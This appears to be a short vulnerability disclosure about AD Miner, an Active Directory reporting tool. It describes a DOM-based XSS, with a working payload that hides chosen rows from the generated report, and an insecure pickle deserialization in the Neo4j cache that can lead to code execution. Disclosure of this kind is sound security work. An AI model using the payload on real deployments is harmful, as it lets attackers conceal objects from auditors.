2 obvious and minor vulnerabilities

[k4amos]

Hi everyone,

These two vulnerabilities are minor and obvious, and they will likely not be fixed. However, it is important for users of AD Miner who do not carefully review its source code to be aware of them:

1. Dom-XSS

An attacker with control over Active Directory can alter the report generated by AD Miner by exploiting one of the XSS vulnerabilities in its code. For example, he could create or rename an AD object to inject malicious code : ServiceAccount<img style=display:none src=x onerror="setTimeout(function(){var keywords=[' + "'" + 'EDDARD' + "'" + ',' + "'" + 'ServiceAccount' + "'" + '];var rows=document.querySelectorAll(' + "'" + '.ag-row' + "'" + ');rows.forEach(function(row){var text=row.innerText.toUpperCase();var shouldRemove=keywords.some(function(k){return text.includes(k.toUpperCase())});if(shouldRemove){row.remove()}})},500)">

This will exploit the XSS at line 39 of the grid_class.py

When viewing the report, lines containing the words ServiceAccount and EDDARD will be removed after a 0.5s timeout. Other modifications to the AD Miner report are likely possible.

2. Insecure Deserialization

This is obvious, but poisoning AD Miner’s Neo4j cache is easy using a malicious pickle file. That’s why you should never share your Neo4j cache (folder cache_neo4j) with others (RCE).